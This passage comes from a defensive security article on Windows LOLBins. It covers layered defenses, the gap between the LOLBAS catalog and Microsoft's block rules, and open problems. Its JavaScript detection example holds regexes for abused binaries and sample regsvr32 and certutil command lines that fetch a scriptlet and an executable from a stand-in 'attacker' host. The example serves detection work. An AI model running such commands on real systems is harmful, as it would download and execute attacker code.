&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;3: Smart App Control&lt;/td&gt;
&lt;td&gt;2022-present&lt;/td&gt;
&lt;td&gt;No default-on for consumers&lt;/td&gt;
&lt;td&gt;Silent disable, defers LOLBins to Gen 2&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;4: WRI&lt;/td&gt;
&lt;td&gt;2024-present&lt;/td&gt;
&lt;td&gt;-- (institutional framing)&lt;/td&gt;
&lt;td&gt;No new LOLBin enforcement primitive&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Note:&lt;/strong&gt; Each generation adds a layer; no generation removes a class. Four bypass classes have been closed in chronological order, but the 167-binary residual between the LOLBAS catalog and the Recommended Block Rules deny list has not narrowed. The class is what survives the chain.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;Four generations, each adding a layer. None removing the class. The next question follows: what does the 2026 state of the art look like, taken as a whole?&lt;/p&gt;
&lt;h2&gt;7. The 2026 State of the Art Is a Stack of Eight&lt;/h2&gt;
&lt;p&gt;A 2026 Windows shop does not pick one of these layers. It stacks all eight. The state of the art for LOLBin defense is the &lt;em&gt;bundle&lt;/em&gt;, not a single technique, and the bundle&apos;s coverage is the union of what each layer sees.&lt;/p&gt;
&lt;p&gt;The eight layers, in roughly the order a defender would deploy them:&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;&lt;strong&gt;App Control for Business with Recommended Block Rules&lt;/strong&gt; -- the enterprise control plane. Kernel-mode signature evaluation, signed XML policies, and Microsoft&apos;s curated deny list merged into the base policy [@ms-bypass-rules]. This is the only layer that &lt;em&gt;enforces by default-deny&lt;/em&gt; at the loader.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Smart App Control&lt;/strong&gt; -- the consumer reputation gate. Reputation lookups against a Microsoft cloud service, AI classification as the fallback, evaluation-then-enforce lifecycle [@ms-sac-overview]. Defers LOLBins to the App Control deny list.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;&lt;a href=&quot;https://paragmali.com/blog/attack-surface-reduction-rules-the-quiet-layer-that-stopped-/&quot; rel=&quot;noopener&quot;&gt;Attack Surface Reduction (ASR) rules&lt;/a&gt;&lt;/strong&gt; -- Defender for Endpoint&apos;s behavioral choke points. Most LOLBin-relevant rules shipped with Windows 10 1709 in October 2017 [@ms-asr-rules-ref]: &lt;em&gt;Block all Office applications from creating child processes&lt;/em&gt;, &lt;em&gt;Block executable content from email client and webmail&lt;/em&gt;, &lt;em&gt;Block JavaScript or VBScript from launching downloaded executable content&lt;/em&gt;, &lt;em&gt;Block use of copied or impersonated system tools&lt;/em&gt;. &lt;em&gt;Block process creations originating from PSExec and WMI commands&lt;/em&gt; arrived later in Windows 10 1803.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Behavioral EDR with Sysmon parent-child detection&lt;/strong&gt; -- the telemetry layer that catches what the enforcement layers miss. SwiftOnSecurity&apos;s &lt;code&gt;sysmon-config&lt;/code&gt; repository [@swiftonsec], the more modular &lt;code&gt;olafhartong/sysmon-modular&lt;/code&gt; configuration [@olafhartong], and vendor-curated analytics like Splunk Research&apos;s rule &lt;code&gt;25689101-012a-324a-94d3-08301e6c065a&lt;/code&gt; for renamed-LOLBin detection [@splunk-detection].&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;&lt;a href=&quot;https://paragmali.com/blog/amsi-the-pre-execution-window-defender/&quot; rel=&quot;noopener&quot;&gt;AMSI&lt;/a&gt; with PowerShell Constrained Language Mode&lt;/strong&gt; -- in-process script-content inspection.AMSI is the only Microsoft-shipped mechanism that lets antimalware inspect &lt;em&gt;script bodies after macro expansion and before eval&lt;/em&gt;, which is the moment the script has been decoded but not yet executed [@ms-amsi-portal]. That moment is the single richest detection signal in the script-host attack surface. The answer Microsoft shipped specifically for PowerShell, JScript, VBScript, and the script hosts Microsoft directly controls.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;The LOLBAS catalog itself&lt;/strong&gt; -- a defensive data structure. Detection engineers parse it to generate rules; SIEM vendors ingest it as detection content; the MITRE ATT&amp;amp;CK pages cite individual entries as primary references [@attack-t1218].&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;ML-driven LOTL classification&lt;/strong&gt; -- the research frontier. Ryan Stamp&apos;s 2022 NLP-over-command-line approach [@arxiv-stamp] and the 2024 work by Trizna and collaborators reporting a 90 percent detection improvement at a false-positive rate of $10^{-5}$ on enterprise-scale LOTL command-line evaluation, with reverse shells as the headline sub-class [@arxiv-trizna] [@hf-quasarnix].&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;&lt;a href=&quot;https://paragmali.com/blog/windows-kernel-code-integrity-2006-2026/&quot; rel=&quot;noopener&quot;&gt;Microsoft Vulnerable Driver Blocklist&lt;/a&gt; and LOLDrivers&lt;/strong&gt; -- the kernel-driver analogue. Microsoft&apos;s blocklist is enabled by default with HVCI, Smart App Control, or S mode active [@ms-driver-blocklist]; the community-maintained LOLDrivers project at &lt;code&gt;loldrivers.io&lt;/code&gt; is the sibling catalog [@loldrivers].&lt;/li&gt;
&lt;/ol&gt;

The Antimalware Scan Interface, introduced with Windows 10 1507. AMSI lets script hosts (PowerShell, JScript, VBScript, the `.NET` runtime) hand the script content they are about to evaluate to the registered antimalware product for inspection before execution. AMSI closes one of the few in-process content-inspection points Microsoft directly controls; it does not see scripts run through non-AMSI hosts (older COM scriptlets, Lua, Node.js, AutoHotkey FFI).
&lt;p&gt;Each layer addresses a different point in the LOLBin life cycle. App Control and SAC enforce at load time, before the binary runs. ASR enforces at behavior time, blocking specific parent-child or write-then-exec patterns. EDR with Sysmon observes at runtime and reacts after the fact. AMSI inspects script content inside the running process. The catalog enumerates what to look for; ML models generalize beyond it. The driver layer covers a sibling class.&lt;/p&gt;

flowchart TD
    Endpoint[&quot;Windows endpoint&quot;]
    Endpoint --&amp;gt; L1[&quot;1. App Control + Recommended Block Rules (kernel CI, default deny)&quot;]
    Endpoint --&amp;gt; L2[&quot;2. Smart App Control (consumer reputation gate)&quot;]
    Endpoint --&amp;gt; L3[&quot;3. ASR rules (behavioral choke points)&quot;]
    Endpoint --&amp;gt; L4[&quot;4. EDR + Sysmon (telemetry and post-hoc detection)&quot;]
    Endpoint --&amp;gt; L5[&quot;5. AMSI + PowerShell CLM (in-process script content)&quot;]
    Endpoint --&amp;gt; L6[&quot;6. LOLBAS catalog (detection-engineering data structure)&quot;]
    Endpoint --&amp;gt; L7[&quot;7. ML LOTL classification (research frontier)&quot;]
    Endpoint --&amp;gt; L8[&quot;8. Driver blocklist + LOLDrivers (sibling class)&quot;]
&lt;p&gt;The head-to-head comparison matrix shows what each layer brings and where the residual risk lives:&lt;/p&gt;
&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Layer&lt;/th&gt;
&lt;th&gt;Decision time&lt;/th&gt;
&lt;th&gt;Coverage breadth&lt;/th&gt;
&lt;th&gt;Marginal cost per new LOLBin&lt;/th&gt;
&lt;th&gt;Failure mode if attacker succeeds&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;&lt;tr&gt;
&lt;td&gt;App Control + Block Rules&lt;/td&gt;
&lt;td&gt;Load&lt;/td&gt;
&lt;td&gt;~40 binaries&lt;/td&gt;
&lt;td&gt;Microsoft must add it to the XML; months-to-years lag&lt;/td&gt;
&lt;td&gt;Binary loads and runs&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Smart App Control&lt;/td&gt;
&lt;td&gt;Load&lt;/td&gt;
&lt;td&gt;Reputation + AI gate; defers LOLBins to App Control&lt;/td&gt;
&lt;td&gt;None (inherits App Control)&lt;/td&gt;
&lt;td&gt;Reputation hijack succeeds; silent disable possible&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;ASR rules&lt;/td&gt;
&lt;td&gt;Behavior&lt;/td&gt;
&lt;td&gt;~8 LOLBin-relevant rules&lt;/td&gt;
&lt;td&gt;Rule author must encode the new pattern&lt;/td&gt;
&lt;td&gt;Pattern slips through; user-facing block toast missing&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;EDR + Sysmon&lt;/td&gt;
&lt;td&gt;Runtime&lt;/td&gt;
&lt;td&gt;Whole catalog if rules exist&lt;/td&gt;
&lt;td&gt;Rule per binary, per variant&lt;/td&gt;
&lt;td&gt;Detection fires after execution&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;AMSI + CLM&lt;/td&gt;
&lt;td&gt;In-process&lt;/td&gt;
&lt;td&gt;PowerShell and AMSI-instrumented hosts only&lt;/td&gt;
&lt;td&gt;Free; instrumented automatically&lt;/td&gt;
&lt;td&gt;Non-AMSI host (older COM scriptlet, Lua) bypasses&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;LOLBAS catalog&lt;/td&gt;
&lt;td&gt;Reference&lt;/td&gt;
&lt;td&gt;207 binaries&lt;/td&gt;
&lt;td&gt;Community editorial cost&lt;/td&gt;
&lt;td&gt;Out-of-catalog LOLBin missed&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;ML LOTL&lt;/td&gt;
&lt;td&gt;Runtime&lt;/td&gt;
&lt;td&gt;Generalizes beyond catalog&lt;/td&gt;
&lt;td&gt;Retraining cost&lt;/td&gt;
&lt;td&gt;False-positive flood; adversarial drift&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Driver blocklist&lt;/td&gt;
&lt;td&gt;Load (kernel)&lt;/td&gt;
&lt;td&gt;Sibling class (drivers, not binaries)&lt;/td&gt;
&lt;td&gt;Microsoft and community curation&lt;/td&gt;
&lt;td&gt;Vulnerable driver loads pre-blocklist&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;
&lt;p&gt;&lt;code&gt;powershell.exe&lt;/code&gt; is conspicuously absent from the App Control Recommended Block Rules deny list, even though it is the most-abused script host in the catalog. The reason is that Microsoft shipped a different answer for PowerShell specifically: Constrained Language Mode, AMSI script-content inspection, script-block logging (Event ID 4104), and module logging (Event ID 4103). For PowerShell the response is &lt;em&gt;instrument deeply, do not deny&lt;/em&gt;; for the rest of the catalog the response is &lt;em&gt;deny when feasible&lt;/em&gt;. There is no published Microsoft criterion explaining when each strategy applies.&lt;/p&gt;
&lt;p&gt;Layer 6 -- the catalog as data structure -- is the layer most defenders underuse. The YAML is parsable, the function taxonomy is closed, the MITRE ATT&amp;amp;CK IDs are stable. A SOC can compile the catalog into a command-line classifier in a few dozen lines:&lt;/p&gt;
&lt;p&gt;{`
// A minimal classifier that takes a candidate Windows command line and
// returns the LOLBAS function category it appears to match. Real SOC
// content compiles the YAML at build time and emits a rule per entry.&lt;/p&gt;
&lt;p&gt;const PATTERNS = [
  { binary: &apos;regsvr32&apos;, re: /regsvr32(\.exe)?.+\/i:https?:/i,  cat: &apos;Execute (AWL Bypass)&apos; },
  { binary: &apos;rundll32&apos;, re: /rundll32(\.exe)?\s+.+\.dll,/i,     cat: &apos;Execute&apos; },
  { binary: &apos;mshta&apos;,    re: /mshta(\.exe)?\s+(https?:|vbscript:|javascript:)/i, cat: &apos;Execute&apos; },
  { binary: &apos;certutil&apos;, re: /certutil(\.exe)?.+(-urlcache|-decode)/i, cat: &apos;Download / Decode&apos; },
  { binary: &apos;bitsadmin&apos;,re: /bitsadmin(\.exe)?.+\/transfer/i,    cat: &apos;Download&apos; },
  { binary: &apos;msbuild&apos;,  re: /msbuild(\.exe)?\s+.+\.csproj|\.xml/i, cat: &apos;Compile&apos; },
  { binary: &apos;installutil&apos;, re: /installutil(\.exe)?\s+\/u\s+/i, cat: &apos;Execute&apos; },
  { binary: &apos;wfc&apos;,      re: /(microsoft\.workflow\.compiler|wfc)(\.exe)?/i, cat: &apos;Compile&apos; }
];&lt;/p&gt;
&lt;p&gt;function classify(cmd) {
  for (const p of PATTERNS) {
    if (p.re.test(cmd)) return { binary: p.binary, category: p.cat };
  }
  return null;
}&lt;/p&gt;
&lt;p&gt;const samples = [
  &apos;regsvr32 /s /n /u /i:http\u003a//attacker/x.sct scrobj.dll&apos;,
  &apos;certutil -urlcache -split -f http\u003a//attacker/x.exe c:\\users\\x.exe&apos;,
  &apos;msbuild.exe project.csproj /t:Build&apos;,
  &apos;wfc.exe rules.xoml config.txt&apos;
];
for (const s of samples) console.log(s, &apos;-&amp;gt;&apos;, classify(s));
`}&lt;/p&gt;
&lt;p&gt;Eight layers, none of which covers all 207 catalog entries. Why is the coverage gap so persistent? The next section compares the three competing taxonomies that have spent the last decade enumerating the class and shows what they agree on and where they diverge.&lt;/p&gt;
&lt;h2&gt;8. Three Taxonomies, Three Counts&lt;/h2&gt;
&lt;p&gt;Three groups have spent the last decade enumerating the LOLBin class from three different angles, and they disagree on the count. The disagreement is informative.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;LOLBAS&lt;/strong&gt; is the community-curated, behaviorally annotated, MITRE-mapped, full binary enumeration. The count as of May 2026 is 207 binaries plus 27 libraries and scripts, totaling 234 entries [@lolbas-github]. Every entry has a YAML file, a function category, an ATT&amp;amp;CK technique ID, a primary-source acknowledgement, and detection guidance. The catalog is exhaustive by design: the editorial criteria admit any Microsoft-signed binary with unexpected attacker-useful functionality.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;MITRE ATT&amp;amp;CK&lt;/strong&gt; organizes the same behaviors as techniques rather than binaries. The relevant nodes are T1218 (&lt;em&gt;System Binary Proxy Execution&lt;/em&gt;, with sub-techniques for Regsvr32, Rundll32, Mshta, InstallUtil, and others) [@attack-t1218]; T1216 (&lt;em&gt;System Script Proxy Execution&lt;/em&gt;) [@attack-t1216]; T1127 (&lt;em&gt;Trusted Developer Utilities Proxy Execution&lt;/em&gt;) [@attack-t1127]; T1197 (&lt;em&gt;BITS Jobs&lt;/em&gt;) [@attack-t1197]; T1140 (&lt;em&gt;Deobfuscate/Decode Files or Information&lt;/em&gt;); and T1105 (&lt;em&gt;Ingress Tool Transfer&lt;/em&gt;). The framework has fewer canonical entries than LOLBAS but richer threat-intelligence linkage: adversary groups, observed campaigns, and detection rules cluster around each technique. The MITRE pages cite LOLBAS as the primary source for binary-level abuse detail.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Microsoft&apos;s App Control Recommended Block Rules&lt;/strong&gt; denies roughly 40 binaries [@ms-bypass-rules]. That is the intersection Microsoft will commit to denying by default in a fully-managed App Control policy. The list is version-pinned, signed, and shipped as XML for administrators to merge into their base policies. Entries include &lt;code&gt;mshta.exe&lt;/code&gt;, &lt;code&gt;Microsoft.Workflow.Compiler.exe&lt;/code&gt;, &lt;code&gt;installutil.exe&lt;/code&gt;, conditionally &lt;code&gt;msbuild.exe&lt;/code&gt;, and the older &lt;code&gt;system.management.automation.dll&lt;/code&gt; versions that allowed Constrained Language Mode bypass.&lt;/p&gt;
&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Dimension&lt;/th&gt;
&lt;th&gt;LOLBAS&lt;/th&gt;
&lt;th&gt;MITRE ATT&amp;amp;CK&lt;/th&gt;
&lt;th&gt;App Control Block Rules&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;&lt;tr&gt;
&lt;td&gt;What counts as an entry&lt;/td&gt;
&lt;td&gt;Per-binary YAML file&lt;/td&gt;
&lt;td&gt;Per-technique node&lt;/td&gt;
&lt;td&gt;Per-binary deny rule&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Count (May 2026)&lt;/td&gt;
&lt;td&gt;234 (207 binaries + 27 libs/scripts)&lt;/td&gt;
&lt;td&gt;~6 top-level techniques, ~12 LOLBin sub-techniques&lt;/td&gt;
&lt;td&gt;~40 binaries&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Update mechanism&lt;/td&gt;
&lt;td&gt;GitHub pull request, community editorial board&lt;/td&gt;
&lt;td&gt;MITRE editorial cycle (quarterly)&lt;/td&gt;
&lt;td&gt;Microsoft Learn page revision&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Enforcement?&lt;/td&gt;
&lt;td&gt;None -- reference only&lt;/td&gt;
&lt;td&gt;None -- reference and CTI&lt;/td&gt;
&lt;td&gt;Yes -- kernel-mode App Control deny&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Primary audience&lt;/td&gt;
&lt;td&gt;Detection engineers, red teams&lt;/td&gt;
&lt;td&gt;Threat intel analysts, CISO reporting&lt;/td&gt;
&lt;td&gt;Enterprise App Control administrators&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;

flowchart TB
    subgraph LOLBAS[&quot;LOLBAS: 207 binaries&quot;]
        L1[&quot;~40 covered by Block Rules&quot;]
        L2[&quot;~167 binaries not denied by default&quot;]
    end
    subgraph MITRE[&quot;MITRE ATT&amp;amp;CK: ~12 LOLBin sub-techniques&quot;]
        M1[&quot;Cites LOLBAS as primary source&quot;]
    end
    subgraph Block[&quot;App Control Block Rules: ~40 binaries&quot;]
        B1[&quot;Subset of LOLBAS&quot;]
    end
    L1 -.- B1
    L2 -. &quot;the gap&quot; .-&amp;gt; Gap[&quot;167-binary residual&quot;]
    MITRE -.- LOLBAS
&lt;p&gt;The discrepancy is the load-bearing observation of this article. &lt;em&gt;207 known&lt;/em&gt; versus &lt;em&gt;~40 denied&lt;/em&gt;. The 167-binary residual is the gap between &lt;em&gt;what the community has proven possible&lt;/em&gt; and &lt;em&gt;what Microsoft will deny by default&lt;/em&gt;. The residual is not a curation backlog. Microsoft maintains the deny list; researchers submit candidates; the criterion for inclusion is operational impact, not novelty. Binaries that would break Windows administration if denied are excluded by design. That is why &lt;code&gt;regsvr32.exe&lt;/code&gt;, &lt;code&gt;rundll32.exe&lt;/code&gt;, &lt;code&gt;certutil.exe&lt;/code&gt;, and &lt;code&gt;bitsadmin.exe&lt;/code&gt; are all in LOLBAS, all in MITRE ATT&amp;amp;CK, and none of them denied by default.&lt;/p&gt;
&lt;p&gt;Jimmy Bayne -- one of the LOLBAS co-maintainers -- runs a parallel community list at &lt;code&gt;bohops/UltimateWDACBypassList&lt;/code&gt; [@bohops-wdac] that explicitly tracks the &lt;em&gt;superset&lt;/em&gt; of binaries that bypass WDAC, including entries that may not yet have made it into the main LOLBAS catalog. Oddvar Moe&apos;s pre-LOLBAS &lt;code&gt;UltimateAppLockerByPassList&lt;/code&gt; [@api0cradle-applocker] performs the same role for AppLocker-era bypasses. Together, the two community lists are the closest available proxy for the &lt;em&gt;real&lt;/em&gt; upper bound on LOLBin candidates.&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Note:&lt;/strong&gt; LOLBAS enumerates 207 Microsoft-signed binaries with attacker-useful primitives. The App Control Recommended Block Rules deny roughly 40 of them by default. The 167-binary residual is the central empirical finding of the LOLBin literature: the binaries Microsoft will not deny are the binaries Windows system administration depends on.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;If the gap were random, Microsoft could close it over time. But it is not random. The binaries Microsoft &lt;em&gt;will not&lt;/em&gt; deny are precisely the binaries Windows system administration depends on: the COM registration utility, the DLL loader, the certificate installer, the BITS download helper. The pattern is too clean to be accidental. That is not a coverage problem. That is an architectural problem. Section 9 explains why.&lt;/p&gt;
&lt;h2&gt;9. The Architectural Argument: Why LOLBins Cannot Be Eliminated&lt;/h2&gt;
&lt;p&gt;Here is the thesis. The LOLBin class is not a defect to be fixed. It is a &lt;em&gt;property&lt;/em&gt; of a thirty-year-old design decision that the entire Windows administration model now depends on.&lt;/p&gt;
&lt;p&gt;The argument has four steps, and each step is empirically grounded in something this article has already shown.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Step 1.&lt;/strong&gt; Windows ships tens of thousands of Microsoft-signed binaries across SKUs. The default AppLocker rule template admits every executable under &lt;code&gt;%windir%&lt;/code&gt; or &lt;code&gt;%programfiles%&lt;/code&gt; via three path-based default rules (executables, scripts, and Windows Installer files) [@ms-applocker-default-rules], and the canonical managed deployment adds a publisher rule that trusts the Microsoft signer chain; the default App Control configuration trusts the same Microsoft signer certificate chain. The first two control planes treat the entire signed-Microsoft binary set as admissible.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Step 2.&lt;/strong&gt; A LOLBin is &lt;em&gt;any&lt;/em&gt; signed binary that exposes a &quot;load and execute attacker-controlled payload&quot; surface. That surface includes loading a script, loading a DLL, loading a XAML or XOML file, running an inline MSBuild task, running a COM scriptlet, running an HTA, running a WSH job, decoding Base64, fetching a URL into the BITS queue, or invoking a &lt;code&gt;[RunInstaller(true)]&lt;/code&gt; class. Each primitive sits behind a documented switch or file format. None of them is a vulnerability in the buffer-overflow sense.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Step 3.&lt;/strong&gt; Every one of those primitives is required by some legitimate administrative tooling. Microsoft cannot remove &lt;code&gt;Microsoft.Workflow.Compiler.exe&lt;/code&gt; without breaking the .NET Workflow Foundation runtime that the binary services. It cannot remove &lt;code&gt;msbuild.exe&lt;/code&gt; without breaking the developer toolchain. It cannot remove &lt;code&gt;regsvr32.exe&lt;/code&gt; without breaking COM registration. It cannot remove &lt;code&gt;bitsadmin.exe&lt;/code&gt; without breaking corporate update servers that depend on the BITS channel. It cannot remove &lt;code&gt;certutil.exe&lt;/code&gt; without breaking certificate-installation workflows that ship in every Active Directory deployment guide.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Step 4.&lt;/strong&gt; Therefore the only available options are (a) revoke individual binaries from the default trust path via the App Control Recommended Block Rules deny list; (b) layer behavioral blocks on top via ASR, SAC, EDR, and AMSI; or (c) rebuild the Windows system-administration model. Microsoft has chosen (a) plus (b). Option (c) is out of scope for backward-compatibility reasons.&lt;/p&gt;

flowchart TD
    Problem[&quot;Signed binary with load-and-execute primitive,&lt;br /&gt;abused with attacker arguments&quot;]
    Problem --&amp;gt; A[&quot;Option A: Revoke from default trust path&quot;]
    Problem --&amp;gt; B[&quot;Option B: Layer behavioral blocks&quot;]
    Problem --&amp;gt; C[&quot;Option C: Rebuild system-administration model&quot;]
    A --&amp;gt; A1[&quot;App Control Recommended Block Rules (~40 binaries)&quot;]
    A --&amp;gt; A2[&quot;Microsoft Recommended Driver Block Rules&quot;]
    B --&amp;gt; B1[&quot;ASR, Smart App Control, EDR, AMSI, Constrained Language Mode&quot;]
    C --&amp;gt; C1[&quot;Not shipping. Would break Windows administration.&quot;]
    style C stroke:#888,stroke-dasharray: 5 5
    style C1 stroke:#888,stroke-dasharray: 5 5
&lt;p&gt;The strongest evidence that Microsoft itself accepts this framing is the &lt;code&gt;msbuild.exe&lt;/code&gt; deny-list entry quoted in Section 5 -- a &lt;em&gt;context-dependent&lt;/em&gt; rule that denies &lt;code&gt;msbuild.exe&lt;/code&gt; unless the endpoint is a developer reference system [@ms-bypass-rules]. That single Microsoft sentence is the architectural argument in one paragraph: Microsoft is admitting, in writing, that the deny list is not absolute. Whether &lt;code&gt;msbuild.exe&lt;/code&gt; is a LOLBin depends on what the machine is used for. There is no possible &lt;em&gt;universal&lt;/em&gt; deny rule for &lt;code&gt;msbuild.exe&lt;/code&gt; because there is no universal answer to &lt;em&gt;do you build .NET projects on this machine?&lt;/em&gt;. The deny list can only ever encode the policy for the use case the administrator has in mind.&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Key idea:&lt;/strong&gt; The LOLBin problem is not a defect to be fixed. It is a property of a thirty-year-old design decision that the entire Windows administration model now depends on.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;A theoretically clean fix exists and is worth naming. It would attach a &lt;em&gt;behavioral capability description&lt;/em&gt; to each Authenticode-signed binary at sign time -- something like &lt;em&gt;this binary may load and execute COM scriptlets from URLs&lt;/em&gt;, or &lt;em&gt;this binary may compile and run unsigned C# from disk&lt;/em&gt;. App Control policy would then enforce on the &lt;em&gt;capability set&lt;/em&gt; rather than the publisher identity. A LOLBin would be any binary whose capability set, intersected with the administrator&apos;s policy, exceeded the policy&apos;s high-water mark.&lt;/p&gt;

A capability-extended Authenticode -- in which each signed binary&apos;s metadata declared the categories of behavior it could perform, and App Control policy could deny by capability rather than by name -- would close the structural gap. It is the design that flows directly from the analysis in Section 3. It is also not on Microsoft&apos;s public roadmap as of Ignite 2024. The reason is not technical. The reason is that every existing signed Microsoft binary would have to be re-signed, every existing third-party signed binary would have to be re-classified, and every administrator would have to learn a new policy vocabulary. The cost is paid by everyone at once; the benefit accrues to defenders only as adoption approaches one.
&lt;p&gt;A further theoretical observation is worth recording. The decision problem behind LOLBin enforcement -- &lt;em&gt;does this signed binary, invoked with these arguments, execute attacker-controlled code?&lt;/em&gt; -- is Rice-class undecidable in the limit. By Rice&apos;s theorem [@rice-1953], any non-trivial semantic property of arbitrary programs is undecidable, which means no static analysis can perfectly classify every possible invocation of every possible signed binary. In practice the problem is also backward-compatibility-bounded: even where decidable approximations exist, Microsoft cannot apply them to existing binaries without re-signing or breaking deployments.&lt;/p&gt;
&lt;p&gt;The detection side has a measurable upper bound that the enforcement side does not. The Trizna 2024 result -- a 90 percent detection improvement at a false-positive rate of $10^{-5}$ on enterprise-scale LOTL command-line evaluation, with reverse shells as the headline sub-class [@arxiv-trizna] -- is the closest published quantitative result on what ML-driven command-line classification can achieve. There is no equivalent enforcement-side result. The asymmetry is not accidental: detection can be probabilistic, but enforcement at the loader must be deterministic.&lt;/p&gt;
&lt;p&gt;If the class cannot be eliminated, the next honest question is: what &lt;em&gt;cannot&lt;/em&gt; be fixed even in principle, and what work is still open? That is the next section.&lt;/p&gt;
&lt;h2&gt;10. Eight Open Problems in 2026&lt;/h2&gt;
&lt;p&gt;Eight problems remain genuinely open as of May 2026. None is fixable with the controls Microsoft currently ships, and each one has direct operational consequences a SOC must plan around.&lt;/p&gt;
&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Problem&lt;/th&gt;
&lt;th&gt;Why it matters&lt;/th&gt;
&lt;th&gt;What has been tried&lt;/th&gt;
&lt;th&gt;Why it isn&apos;t fixed&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;&lt;tr&gt;
&lt;td&gt;Block-list latency&lt;/td&gt;
&lt;td&gt;Disclosure-to-deny lag is months to years&lt;/td&gt;
&lt;td&gt;Periodic Recommended Block Rules updates [@ms-bypass-rules]&lt;/td&gt;
&lt;td&gt;Microsoft does not publish a SLA; no quantitative lag study exists&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Version-pinned bypass via older signed copies&lt;/td&gt;
&lt;td&gt;Attacker drops a 2017-vintage signed &lt;code&gt;wfc.exe&lt;/code&gt; from an archive; deny list misses it&lt;/td&gt;
&lt;td&gt;Hash-revocation rules per binary&lt;/td&gt;
&lt;td&gt;Asymptotic completeness of the hash list is unattainable in practice&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Smart App Control silent disable&lt;/td&gt;
&lt;td&gt;A protected device becomes unprotected with no admin signal&lt;/td&gt;
&lt;td&gt;Microsoft documents the behavior; in-place re-enable shipped via a recent Windows cumulative update [@ms-sac-support]&lt;/td&gt;
&lt;td&gt;Silent disable itself remains by design&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;No capability-extended Authenticode&lt;/td&gt;
&lt;td&gt;Publisher trust has no first-class representation of behavior&lt;/td&gt;
&lt;td&gt;Discussed in academic and red-team writing; not on Microsoft roadmap&lt;/td&gt;
&lt;td&gt;See Section 9: would require re-signing the world&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;AMSI gaps in non-AMSI script hosts&lt;/td&gt;
&lt;td&gt;Native COM scriptlets, older .NET, Lua, Node.js, AutoHotkey FFI bypass AMSI&lt;/td&gt;
&lt;td&gt;Microsoft instrumented PowerShell, JScript, VBScript&lt;/td&gt;
&lt;td&gt;Third-party script hosts opt in or do not&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Detection-engineering economics&lt;/td&gt;
&lt;td&gt;Per-LOLBin rule authoring scales linearly with catalog growth&lt;/td&gt;
&lt;td&gt;Community projects (SwiftOnSecurity, sysmon-modular), Splunk Research [@splunk-detection]&lt;/td&gt;
&lt;td&gt;LOLBAS adds entries faster than rules can be generalized&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Coverage gap LOLBAS vs MITRE vs Block Rules&lt;/td&gt;
&lt;td&gt;No published mapping reconciles all three&lt;/td&gt;
&lt;td&gt;Manual cross-references in vendor documentation&lt;/td&gt;
&lt;td&gt;Each project has different editorial scope&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;The PowerShell special case&lt;/td&gt;
&lt;td&gt;&quot;Instrument deeply&quot; for one host, &quot;deny&quot; for the others&lt;/td&gt;
&lt;td&gt;AMSI + CLM + script-block logging&lt;/td&gt;
&lt;td&gt;No published Microsoft criterion for when each applies&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;
&lt;p&gt;The empirical anchor for why this matters is published. In its Q3 2025 TTP Briefing, Cybereason reported the share of investigations involving LOLBins:&lt;/p&gt;

